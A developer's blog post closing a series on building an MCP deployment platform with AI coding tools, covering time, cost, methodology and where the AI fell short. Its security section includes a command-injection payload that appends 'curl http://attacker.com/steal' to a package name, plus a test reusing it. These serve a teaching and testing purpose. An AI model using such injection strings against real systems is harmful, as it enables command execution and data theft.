Part 7: Lessons Learned - The AI Orchestrator's Handbook
The Story So Far: In 2 weeks (Dec 11-23, 2025), I built a production MCP deployment platform entirely with AI orchestration. Zero lines manually coded. But what did I actually learn?
This is the handbook I wish I had on Day 1.
The Final Numbers
Before the lessons, let's quantify what AI orchestration achieved:
Quantitative Results
Time Investment: ~60 hours over 13 days
- AI code generation: ~15 hours (25%)
- Code review & validation: ~12 hours (20%)
- Debugging infrastructure: ~18 hours (30%)
- Testing and quality assurance: ~8 hours (13%)
- Documentation: ~7 hours (12%)
Code Output:
- Backend (Python): ~2,100 lines
- Frontend (TypeScript): ~1,300 lines
- Infrastructure (Docker, configs): ~200 lines
- Tests: ~800 lines
- Total: ~4,400 lines of production code
Documentation:
- AI_ORCHESTRATION.md: 3,500 words
- CONTRIBUTING.md: 800 words
- AUTH_TROUBLESHOOTING.md: 600 words
- SETUP.md: 600 words
- DEPLOYMENT.md: 900 words
- README.md: 1,200 words
- Context files: ~5,000 words
- Total: ~13,000 words (roughly three words of documentation for every line of code)
Quality Metrics:
- Test coverage: 87%
- Type safety: 100% (zero 'any' types in TypeScript)
- Linter compliance: 100% (passes ruff and eslint with zero warnings)
- Security review: Passed multi-agent audit (4 AI reviewers)
Production Deployment:
- Backend: https://catwalk-backend.fly.dev ✅
- PostgreSQL: Fly.io managed database ✅
- Frontend: Vercel deployment ✅
- End-to-end MCP tool calling: Works ✅
Manual Coding: 0 lines
- Everything generated by AI
- My role: architect, reviewer, debugger, validator
Estimated Time Savings vs Manual Coding: ~140 hours
- Traditional estimate for this scope: ~200 hours
- Actual time spent: ~60 hours
- Savings: ~140 hours (70% reduction)
Qualitative Results
System Architecture: Comparable to senior engineer design
- 3-layer architecture (Frontend → Backend → MCP Containers)
- Proper separation of concerns
- Security-first credential management
- Production-grade error handling
Code Quality: Production-ready
- Type-safe throughout
- Comprehensive error handling
- Extensive input validation
- Secret masking and audit logging
Developer Experience: Smooth
- Clear setup instructions
- Robust error messages
- Comprehensive troubleshooting guides
- Active documentation
Proof of Concept: Validated
- Open source: https://github.com/zenchantlive/catwalk
- MIT licensed
- Reproducible methodology documented
- Real production deployment
Where AI Excelled
1. Boilerplate and Patterns (95%+ AI Success Rate)
What AI nailed:
- FastAPI endpoint scaffolding
- SQLAlchemy model relationships
- Pydantic validation schemas
- React component structure
- TypeScript type definitions
- Alembic database migrations
- Docker multi-stage builds
- API client generation
Example: Dynamic form generation component
Prompt:
Create a FormBuilder component that:
- Takes AnalysisResult as input
- Generates form fields from env_vars array
- Uses password inputs for secrets
- Validates required fields
- Type-safe with TypeScript strict mode
AI delivered: ~150 lines of perfect TypeScript in under 5 minutes.
Why this worked: Form generation is a well-documented pattern in React. Massive training data.
2. Testing (90%+ AI Success Rate)
What AI generated perfectly:
- Unit test structure (pytest, Vitest)
- Mocking patterns (unittest.mock, vi.mock)
- Integration test scenarios
- Edge case coverage
- Assertion logic
Example: Package validator tests
# Generated by Claude Code
import pytest
# (PackageValidator is imported from the backend's validation module)
@pytest.mark.asyncio
async def test_validate_package_npm_success():
"""Test successful npm package validation"""
validator = PackageValidator()
result = await validator.validate_package("@modelcontextprotocol/server-github")
assert result["valid"] is True
assert result["runtime"] == "npm"
assert result["error"] is None
@pytest.mark.asyncio
async def test_validate_package_invalid():
"""Test invalid package name"""
validator = PackageValidator()
result = await validator.validate_package("definitely-not-a-real-package-xyz")
assert result["valid"] is False
assert result["runtime"] == "unknown"
assert "not found" in result["error"]
51 tests generated. 90% worked first try. 10% needed minor mock adjustments.
Why this worked: Testing patterns are formulaic. AI has seen millions of test examples.
3. Documentation Structure (85%+ AI Success Rate)
What AI generated well:
- README.md templates
- API documentation (Swagger/OpenAPI)
- Inline code comments
- Setup instructions
- Architecture diagrams (Mermaid markdown)
Example: SETUP.md generated from a simple prompt
Prompt: "Write SETUP.md with local development instructions for both backend and frontend"
AI delivered: Complete setup guide with:
- Prerequisites
- Step-by-step installation
- Environment variable configuration
- Running tests
- Troubleshooting common issues
Why this worked: Documentation templates are abundant in open source projects.
4. Refactoring (80%+ AI Success Rate)
What AI did efficiently:
- Extract functions into modules
- Rename variables consistently
- Update imports across files
- Convert camelCase ↔ snake_case
- Add type hints to existing code
Example: Extracted Zod schema generation from FormBuilder component
Prompt: "Extract Zod schema generation logic from FormBuilder.tsx into a dedicated utility file"
AI output:
- Created lib/generate-zod-schema.ts with the extracted logic
- Updated FormBuilder.tsx to import the utility
- Updated all tests to use the new utility
- Fixed all import paths
Time: ~2 minutes
Manual estimate: ~20 minutes (find all references, update imports, validate)
Why this worked: Refactoring is pattern matching. AI understands dependency graphs.
Where AI Struggled
1. Infrastructure-Specific Quirks (30% AI Success Rate)
What AI got wrong initially:
- PostgreSQL driver selection (asyncpg vs psycopg3)
- Fly.io SSL parameter handling
- Docker CRLF line ending issues (Windows)
- Environment variable timing (build vs runtime)
- Fly.io Postgres cluster recovery
Example: The asyncpg disaster
AI's first suggestion:
# Use asyncpg for PostgreSQL
pip install asyncpg
DATABASE_URL = "postgresql+asyncpg://..."
The reality: asyncpg doesn't support Fly.io's sslmode parameter → crashes
The fix (manual):
# Use psycopg3 instead
pip install psycopg[binary]
DATABASE_URL = "postgresql+psycopg://..."
Why AI struggled: Fly.io-specific quirks aren't in training data. Infrastructure combinations (Fly.io + SQLAlchemy + SSL) are niche.
Lesson: Don't trust AI blindly on infrastructure. Validate in real environments.
2. Security Vulnerabilities (20% AI Success Rate)
What AI missed:
- Command injection in package name handling
- Credential leaks in API responses
- Missing input validation
- Race conditions in concurrent code
- Lack of audit logging
Example: Command injection vulnerability
AI-generated code:
# VULNERABLE - no validation
package_name = user_input["package"]
env = {"MCP_PACKAGE": package_name} # Injected into shell
The attack:
package_name = "@evil/pkg; curl http://attacker.com/steal"
# Shell executes: npx -y @evil/pkg; curl http://attacker.com/steal
Why AI missed this: AI generates happy paths. Security requires adversarial thinking.
Solution: Use multi-agent code review (CodeRabbit caught this)
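Once flagged, the fix is straightforward. Here's an illustrative sketch of strict package-name validation based on npm/PyPI naming rules (the regex and function name are mine, not the project's actual implementation):
import re

# Conservative allowlist: optional npm scope, then letters, digits, and . _ - only
SAFE_PACKAGE = re.compile(r"^(@[a-z0-9][a-z0-9._-]*/)?[a-z0-9][a-z0-9._-]*$", re.IGNORECASE)

def assert_safe_package_name(name: str) -> str:
    """Reject anything that could smuggle shell metacharacters into the deploy command."""
    if not SAFE_PACKAGE.fullmatch(name):
        raise ValueError(f"Invalid package name: {name!r}")
    return name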
3. Cross-System Integration (40% AI Success Rate)
What AI failed to connect:
- NextAuth session → PostgreSQL user sync
- JWT token creation → backend verification
- Frontend auth flow → backend dependencies
- Fly.io machine creation → backend proxying
Example: The user sync gap
AI generated:
- NextAuth configuration ✅
- JWT signing logic ✅
- Backend auth middleware ✅
AI didn't generate:
- The glue code that syncs users from NextAuth to PostgreSQL
Why this happened: Each piece exists in training data, but the integration between them is project-specific.
Lesson: AI generates components. You architect how they fit together.
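For context, the missing glue was roughly this shape: a get-or-create step that runs when an authenticated request first reaches the backend. This is a hedged sketch; the model fields and session wiring are illustrative, not the project's actual code.
from sqlalchemy import String, select
from sqlalchemy.ext.asyncio import AsyncSession
from sqlalchemy.orm import DeclarativeBase, Mapped, mapped_column

class Base(DeclarativeBase):
    pass

class User(Base):
    __tablename__ = "users"
    id: Mapped[int] = mapped_column(primary_key=True)
    email: Mapped[str] = mapped_column(String(255), unique=True)
    name: Mapped[str] = mapped_column(String(255))

async def get_or_create_user(session: AsyncSession, email: str, name: str) -> User:
    """Sync the NextAuth identity into PostgreSQL on first contact."""
    result = await session.execute(select(User).where(User.email == email))
    user = result.scalar_one_or_none()
    if user is None:
        user = User(email=email, name=name)
        session.add(user)
        await session.commit()
    return user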
4. Environment Configuration (10% AI Success Rate)
What AI couldn't validate:
- Whether .env files have required secrets
- If Fly.io secrets are set correctly
- Secret value mismatches between environments
- Timing issues (when env vars are loaded)
Example: AUTH_SECRET mismatch nightmare (Part 5)
AI generated: Code that uses process.env.AUTH_SECRET
AI didn't check:
- Is this variable defined in .env.local?
- Does it match the backend secret?
- Is it set at build time or runtime?
Result: Days of debugging 401 errors
Why AI can't help: Environment state is invisible to AI. It only sees code.
Lesson: Manual environment validation is non-negotiable.
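A cheap way to enforce that is a preflight script that fails fast when required variables are missing. The variable names below are examples; list whatever your project actually needs.
import os
import sys

REQUIRED = ["AUTH_SECRET", "DATABASE_URL", "ANTHROPIC_API_KEY"]  # example names, not the project's full list

missing = [name for name in REQUIRED if not os.environ.get(name)]
if missing:
    sys.exit(f"Missing required environment variables: {', '.join(missing)}")
print("Environment looks complete.")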
5. Debugging Production Issues (5% AI Success Rate)
What AI couldn't debug:
- Fly.io Postgres "no active leader found" error
- SSL certificate issues
- Network connectivity between machines
- Log interpretation
Example: PostgreSQL cluster failure
The error: no active leader found
AI's suggestion: "Try restarting the database"
The reality: Single-node cluster in unrecoverable state. Must destroy and recreate.
Why AI failed: Requires infrastructure knowledge (Fly.io Postgres architecture) + log interpretation + operational experience.
Lesson: Infrastructure debugging is still human work.
The Reproducible Methodology
Based on this journey, here's the step-by-step framework for AI-orchestrated development:
Phase 1: Foundation (Before Writing Code)
Step 1: Create Context Structure
Before a single line of code:
project/
├── AGENTS.md # AI system prompt
├── context/
│ ├── ARCHITECTURE.md # System design
│ ├── CURRENT_STATUS.md # Living status doc
│ ├── TECH_STACK.md # Every dependency + why
│ └── Project_Overview.md # Problem + solution
Step 2: Write Structured Prompts
Bad prompt: "Build an MCP deployment platform"
Good prompt:
Build a platform for deploying MCP servers to Fly.io.
REQUIREMENTS:
- GitHub repo analysis with Claude API
- Credential encryption (Fernet)
- Fly.io machine deployment
- MCP Streamable HTTP (2025-06-18 spec)
TECH STACK:
- Frontend: Next.js 15, React 19, TypeScript 5+ (strict mode)
- Backend: FastAPI, PostgreSQL + psycopg3, SQLAlchemy async
- Infrastructure: Fly.io Machines API, Docker
QUALITY:
- Zero TypeScript 'any' types
- Passes ruff (Python) / eslint (TypeScript) with zero warnings
- Comprehensive error handling
- Input validation with Pydantic
SECURITY:
- Validate all user input
- Mask secrets in API responses
- No shell injection risks
- Audit logging for sensitive actions
SUCCESS CRITERIA:
- End-to-end MCP tool calling works
- Production deployed on Fly.io
- 85%+ test coverage
Step 3: Multi-AI Cross-Validation
Feed the same prompt to:
- Claude Code
- ChatGPT-4
- Google Gemini
Compare architectures. Where they agree = good design. Where they disagree = complexity indicator.
Phase 2: Implementation (Code Generation)
Step 4: Phase-Based Development
Break project into explicit phases:
- Phase 1: Database models + encryption
- Phase 2: Analysis service
- Phase 3: Deployment orchestration
- Phase 4: Frontend UI
- Phase 5: Production deployment
One phase per session. Don't let AI scope-creep.
Step 5: Generate Code with Constraints
Always include:
CONSTRAINTS:
- Type-safe (no 'any' in TypeScript, full hints in Python)
- Linter-compliant (must pass ruff/eslint)
- Error handling for all failure modes
- Tests for critical paths
Update CURRENT_STATUS.md when done.
Step 6: Immediate Validation
After each code generation:
# Backend
ruff check .
ruff format .
pytest
# Frontend
bun run typecheck
bun run lint
bun run test
Don't proceed until all checks pass.
Phase 3: Quality Control (Validation)
Step 7: Multi-Agent Code Review
Set up on GitHub (free for open source):
- CodeRabbit (security)
- Qodo (edge cases)
- Gemini Code Assist (quality)
- Greptile (integration)
Create PR for each phase. Let agents review.
Step 8: Fix Review Feedback
Feed agent comments back to AI:
CodeRabbit flagged command injection in deployment service.
Add package validation against npm/PyPI registries before deploying.
AI generates fixes. You validate.
Step 9: Test in Real Environments
Don't trust local development.
Deploy to staging (or production if you're brave):
- Real database (not SQLite)
- Real secrets management
- Real network conditions
- Real SSL/TLS
Catch environment issues early.
Phase 4: Documentation (Knowledge Capture)
Step 10: Document As You Go
After each debugging session:
- Update CURRENT_STATUS.md (what works, what doesn't)
- Update AGENTS.md if you learned new AI interaction patterns
- Create troubleshooting docs for nasty bugs (like AUTH_TROUBLESHOOTING.md)
Step 11: Write for Future You
Assume you'll forget everything in 1 week.
Document:
- Why you chose psycopg3 over asyncpg
- How to recover from Fly.io Postgres failures
- Which secrets must match across environments
Future you will thank past you.
Phase 5: Security Audit (Adversarial Review)
Step 12: Think Like an Attacker
AI generates happy paths. You must find malicious paths.
Ask:
- What if user input contains shell metacharacters?
- What if API key is compromised?
- What if user submits 10,000 requests/second?
- What if database connection fails mid-transaction?
Prompt AI for fixes:
Add input validation that rejects shell metacharacters.
Add rate limiting (100 req/min per IP).
Add transaction rollback on errors.
Step 13: Security Testing
Generate attack scenarios:
# Test command injection
malicious_package = "@evil/pkg; curl http://attacker.com"
response = await create_deployment({"package": malicious_package})
assert response.status_code == 400 # Must reject
If tests pass = exploit blocked. If tests fail = vulnerability found.
Phase 6: Production Hardening (Polish)
Step 14: Error Message Quality
Bad (AI default):
{"error": "Failed to create deployment"}
Good (prompt for better UX):
{
"error": "invalid_package",
"message": "Package '@evil/pkg; curl' not found in npm or PyPI",
"help": "Verify the package name at https://npmjs.com",
"docs": "https://docs.catwalk.live/troubleshooting#invalid-package"
}
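In FastAPI terms, that shape is easy to produce with a custom exception handler. A minimal sketch (the exception class and handler names are illustrative, not the project's actual code):
from fastapi import FastAPI, Request
from fastapi.responses import JSONResponse

app = FastAPI()

class InvalidPackageError(Exception):
    def __init__(self, package: str) -> None:
        self.package = package

@app.exception_handler(InvalidPackageError)
async def invalid_package_handler(request: Request, exc: InvalidPackageError) -> JSONResponse:
    # Structured error body: machine-readable code plus human-readable guidance
    return JSONResponse(
        status_code=400,
        content={
            "error": "invalid_package",
            "message": f"Package '{exc.package}' not found in npm or PyPI",
            "help": "Verify the package name at https://npmjs.com",
        },
    )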
Step 15: Observability
Add logging, metrics, and monitoring:
logger.info(f"Deployment {id} created by user {user.email}")
logger.warning(f"Package validation failed: {package_name}")
logger.error(f"Fly.io API error: {error}", extra={"deployment_id": id})
Production debugging without logs is impossible.
The Skill Shift
Old Role: Developer (Code Writer)
Primary skill: Writing syntactically correct code
Daily work:
- Implementing functions line-by-line
- Debugging syntax errors
- Googling "how to X in language Y"
- Stack Overflow for common patterns
Value: Lines of code produced
New Role: AI Orchestrator (System Architect)
Primary skill: Architecting systems and validating AI outputs
Daily work:
- Designing system architecture
- Writing structured prompts with constraints
- Reviewing AI-generated code for logic errors
- Debugging infrastructure and integration issues
- Thinking adversarially about security
- Documenting decisions and debugging paths
Value: System quality and velocity
What This Means for Your Career
Skills that INCREASE in value:
- System design - AI needs architectural direction
- Prompt engineering - Specificity = quality
- Code review - Validating AI outputs critically
- Debugging - Infrastructure, integration, environment
- Security thinking - Adversarial mindset
- Documentation - Making implicit knowledge explicit
Skills that DECREASE in value:
- Syntax memorization - AI knows every API
- Boilerplate writing - AI generates it instantly
- Pattern copying - AI has seen all patterns
- Manual refactoring - AI does it faster
The transition: From writing code → validating systems
Analogy: Before trucks, moving rocks required strong backs. After trucks, it required knowing how to drive and where to deliver.
Common Pitfalls and How to Avoid Them
Pitfall 1: Blindly Trusting AI
Symptom: Merging AI-generated code without review
Risk: Security vulnerabilities, logic errors, integration failures
Solution:
- Always run linters and tests
- Review diffs manually
- Think: "What could go wrong?"
- Use multi-agent code review
Pitfall 2: Vague Prompts
Symptom: AI generates code that "kind of works" but has issues
Risk: Wasted time iterating, poor code quality
Solution:
- Specific tech stack (Next.js 15, not just "React")
- Explicit constraints (no 'any' types, must pass linter)
- Success criteria (what does "done" look like?)
Pitfall 3: No External Memory
Symptom: AI "forgets" decisions across sessions, regenerates code you already rejected
Risk: Inconsistent architecture, wasted effort
Solution:
- Create AGENTS.md and context/ structure
- Update after each session
- Start new sessions by loading context
Pitfall 4: Skipping Environment Validation
Symptom: Code works locally but fails in production
Risk: Deployment disasters, late-night debugging
Solution:
- Test in production-like environments early
- Validate secrets are set before deploying
- Document environment setup explicitly
Pitfall 5: Ignoring Review Agents
Symptom: Security issues and quality problems slip through
Risk: Vulnerabilities in production, maintainability issues
Solution:
- Set up CodeRabbit, Qodo, Gemini Code Assist, Greptile
- Review all their comments
- Feed feedback back to AI for fixes
The Economics of AI Orchestration
Costs
AI Services (my actual usage):
- Claude Code (Anthropic CLI): $0 (included in Claude Pro subscription)
- OpenRouter (analysis service): ~$2 (used Claude Haiku 4.5)
- GitHub Copilot: Not used
- ChatGPT Plus: $20/month (used for cross-validation)
Total AI costs: ~$22 for the project
Infrastructure:
- Fly.io backend: ~$2/month (always-on shared-cpu)
- PostgreSQL: $0 (free tier)
- Vercel frontend: $0 (free tier)
Total infrastructure: ~$2/month
Time Investment: ~60 hours @ $100/hour freelance rate = $6,000 opportunity cost
Value Created
Code produced: ~4,400 lines production-ready
- Traditional estimate: ~200 hours @ $100/hour = $20,000
- AI-assisted actual: ~60 hours @ $100/hour = $6,000
- Savings: $14,000 (70% time reduction)
Alternatives considered:
- Hire developers: $10,000+ for this scope
- Learn to code manually: 6+ months to reach this proficiency
- Use no-code tools: None exist for this use case (MCP deployment)
ROI: 635x return on AI costs ($14,000 saved / $22 AI cost)
Intangible value:
- Learned AI orchestration methodology (transferable skill)
- Portfolio piece (open source project)
- Documentation case study (blog series)
- Validated production deployment (proof of concept)
The Future (My Predictions)
1-2 Years: AI Orchestration Becomes Standard
What changes:
- "Junior developer" means "good at prompting AI"
- Code review becomes "AI output review"
- 10x productivity gains become normal
- Solo founders ship enterprise-scale products
What doesn't change:
- System architecture still requires humans
- Security thinking still requires humans
- Product decisions still require humans
- Debugging infrastructure still requires humans
3-5 Years: AI Handles More of the Stack
Speculation:
- AI debugs infrastructure (interprets logs, fixes config)
- AI performs security audits automatically
- AI handles deployment and rollbacks
- AI writes documentation from code changes
What humans do:
- Define product vision
- Make trade-off decisions
- Validate system behavior
- Handle novel problems (edge cases AI hasn't seen)
10+ Years: Unknown
Possibilities:
- AI handles full system design
- Human role becomes "product vision" only
- Or: We discover new bottlenecks AI can't solve
- Or: Human oversight remains critical for safety
What I believe: The orchestration skill (getting AI to build what you envision) will remain valuable indefinitely.
Your Action Plan
Want to replicate this methodology? Here's your Week 1:
Day 1: Setup
- Sign up for Claude Code (or Cursor, or Copilot)
- Create a project with AGENTS.md and context/ structure
- Install linters (ruff for Python, eslint for TypeScript)
Day 2: Practice Prompting
- Choose a simple project (e.g., "Build a todo API")
- Write a structured prompt with constraints
- Generate code, run linters, iterate
Day 3: Review and Validate
- Set up CodeRabbit on GitHub (free for open source)
- Create PR with AI-generated code
- Review agent feedback, feed back to AI
Day 4: Infrastructure Deploy
- Deploy to real environment (Fly.io, Vercel, Railway)
- Encounter environment issues
- Document solutions
Day 5: Security Thinking
- Try to break your own system
- Generate attack scenarios as tests
- Prompt AI to fix vulnerabilities
Day 6: Documentation
- Write troubleshooting guide
- Update AGENTS.md with learnings
- Create README for future you
Day 7: Reflect
- What did AI do well?
- What required manual intervention?
- How would you do it differently next time?
Repeat this cycle. Each iteration, you'll get faster and more effective.
Final Thoughts
Can AI build production systems?
Yes - with heavy human orchestration.
AI is not a replacement for developers. It's a power tool that amplifies human architects.
The skill isn't coding anymore. It's:
- Architecting systems worth building
- Prompting AI with precision
- Validating outputs critically
- Debugging the real world
- Making trade-offs under uncertainty
This is the new craft.
And honestly? I love it.
I get to focus on problems I care about (MCP deployment UX, credential security, system architecture) instead of fighting syntax errors and writing boilerplate.
AI handles the tedious. I handle the interesting.
That's the future I want to build in.
Acknowledgments
Built with:
- Claude Code (Anthropic) - Primary implementation
- Cursor - Refactoring and iteration (mentioned in docs)
- Google Gemini - Planning and cross-validation
- ChatGPT-4 - Architecture validation
Reviewed by:
- CodeRabbit - Security analysis
- Qodo - Edge case detection
- Gemini Code Assist - Code quality
- Greptile - Integration checks
Inspired by:
- Vercel's developer experience
- The MCP ecosystem
- The AI orchestration community
- Every developer frustrated with infrastructure complexity
Special thanks to you, the reader, for making it through all 7 parts. If this series helped you, pay it forward - share the methodology.
Where to Go From Here
Explore the codebase:
- GitHub: https://github.com/zenchantlive/catwalk
- Complete methodology: AI_ORCHESTRATION.md
- Contribution guide: CONTRIBUTING.md
Try it yourself:
- Fork the repo
- Deploy to Fly.io
- Contribute improvements
- Document your own AI orchestration journey
Connect:
- Questions? Open a GitHub issue
- Built something similar? Share in discussions
- Want to hire an AI orchestrator? Email: jordanlive121@gmail.com
Read the other parts:
- Part 1: Genesis
- Part 2: Foundation
- Part 3: Production Baptism
- Part 4: The Pivot
- Part 5: Authentication Hell
- Part 6: Security Awakening
- Part 7: Lessons Learned (you are here)
This is the end of the series. But it's just the beginning of AI-orchestrated development.
Your turn. Build something.
Series: Building Catwalk Live with AI Orchestration (Complete)
Author: Jordan Hindo (AI Orchestrator, Technical Product Builder)
Project: https://github.com/zenchantlive/catwalk
License: MIT
Published: December 2025
All 7 parts written, researched, and structured - documenting a real journey from initial commit to production deployment, entirely through AI orchestration.
Jordan Hindo
Full-stack Developer & AI Engineer building in public. Exploring the future of agentic coding and AI-generated assets.